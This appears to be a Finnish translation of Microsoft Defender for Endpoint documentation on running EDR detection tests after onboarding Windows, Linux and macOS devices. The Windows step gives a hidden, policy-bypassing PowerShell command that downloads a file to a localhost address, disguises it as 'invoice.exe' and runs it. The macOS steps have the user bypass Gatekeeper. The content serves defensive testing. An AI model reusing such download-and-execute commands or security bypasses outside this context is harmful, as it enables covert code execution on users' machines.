EDR-tunnistustesti laitteen perehdytys- ja raportointipalveluiden tarkistamista varten
- Windows 11 Windows 10 version 1709 koontiversio 16273 tai uudempi versio, Windows 8.1 tai Windows 7 SP1.
- Windows Server 2022, Windows Server 2019, Windows Server 2016, Windows Server 2012 R2 ja Windows Server 2008 R2 SP1.
- Linux
- macOS
- Microsoft Defender for Endpoint
- Microsoft Defender for Endpoint Linuxissa
Päätepisteen tunnistus ja päätepisteen vastaus tarjoavat kehittyneet hyökkäystunnistimet, jotka ovat lähellä reaaliaikaisia ja toiminnallisia. Suojausanalyytikot voivat priorisoida hälytyksiä tehokkaasti, saada näkyvyyttä murron koko laajuudesta ja ryhtyä toimiin uhkien korjaamiseksi.
Suorita EDR-tunnistustesti varmistaaksesi, että laite on oikein otettu käyttöön ja että se raportoi palvelulle. Suorita seuraavat vaiheet juuri perehdytetyssä laitteessa:
Avaa komentokehoteikkuna
Kopioi ja suorita seuraava komento kehotteen kohdalla. Komentokehoteikkuna sulkeutuu automaattisesti.
powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-WDATP-test\\invoice.exe');Start-Process 'C:\\test-WDATP-test\\invoice.exe'
Jos tämä onnistuu, tunnistustesti merkitään valmiiksi ja uusi ilmoitus ilmestyy muutaman minuutin kuluessa.
- Lataa komentosarjatiedosto perehdyttyyn Linux-palvelimeen
curl -o ~/Downloads/MDE-Linux-EDR-DIY.zip -L https://aka.ms/MDE-Linux-EDR-DIY
- Pura zip-tiedosto
unzip ~/Downloads/MDE-Linux-EDR-DIY.zip
- Ja suorita seuraava komento, jos haluat antaa komentosarjan suoritusoikeuden:
chmod +x ./mde_linux_edr_diy.sh
- Suorita komentosarja suorittamalla seuraava komento:
./mde_linux_edr_diy.sh
- Muutaman minuutin kuluttua tunnistaminen tulee nostaa Microsoft Defender XDR. Katso ilmoituksen tietoja, koneen aikajanaa ja suorita tyypilliset tutkimusvaiheet.
Lataa selaimessasi, Microsoft Edge for Macissa tai Safarissa MDATP MacOS -DIY.ziphttps://aka.ms/mdatpmacosdiy kohteesta ja pura se.
Näyttöön tulee seuraava kehote:
Haluatko sallia lataukset mdatpclientanalyzer.blob.core.windows.net?
Voit muuttaa sitä, mitkä sivustot voivat ladata tiedostoja sivustojen asetuksista.Valitse Salli.
Avaa Lataukset.
Sinun on pystyttävä näkemään MDATP MacOS DIY.
Vihje
Jos kaksoisnapsautat MDATP MacOS DIY :ta, näyttöön tulee seuraava sanoma:
MDATP MacOS DIY -sovellusta ei voi avata, koska kehittäjä ei voi olla todentaja.
macOS ei voi varmistaa, että tämä sovellus on ilmainen haittaohjelmasta.
[Siirrä roskakoriin][Peruuta]Valitse Cancel.
Napsauta hiiren kakkospainikkeella MDATP MacOS DIY ja valitse sitten Avaa.
Järjestelmä näyttää seuraavan sanoman:
macOS ei voi tarkistaa MDATP MacOS DIY:n kehittäjää. Haluatko varmasti avata sen?
Avaamalla tämän sovelluksen ohitat järjestelmän suojauksen, joka voi altistaa tietokoneesi ja henkilökohtaiset tietosi haittaohjelmille, jotka voivat vahingoittaa Mac-tietokonettasi tai vaarantaa yksityisyytesi.Valitse Avaa.
Järjestelmä näyttää seuraavan sanoman:
Microsoft Defender for Endpoint - macOS EDR DIY -testitiedosto
Vastaava ilmoitus on käytettävissä MDATP-portaalissa.Valitse Avaa.
Muutaman minuutin kuluttua annetaan hälytys macOS EDR -testihälytys .
Siirry Microsoft Defender portaaliin (https://security.microsoft.com/).
Siirry ilmoitusjonoon .
MacOS EDR -testi-ilmoitus näyttää vakavuuden, luokan, tunnistuslähteen ja kutistetun toimintovalikon.
Tarkastele ilmoituksen tietoja ja laitteen aikajanaa ja suorita tavalliset tutkintavaiheet.
Jos sinulla on ongelmia sovellusten yhteensopivuuden tai suorituskyvyn kanssa, voit harkita poissulkemisten lisäämistä. Lisätietoja on seuraavissa artikkeleissa:
- Microsoft Defender for Endpoint poissulkemisten määrittäminen ja vahvistaminen macOS:ssä
- Virheellisten positiivisten ja negatiivisten esiintymien korjaaminen Microsoft Defender for Endpointissa
- Estosääntöjen hallinta
- Kompromissi-indikaattorien luominen (IoC)
- Mukautettujen tunnistussääntöjen luominen ja hallinta
Katso myös Microsoft Defender for Endpoint Suojaustoiminnot-oppaasta.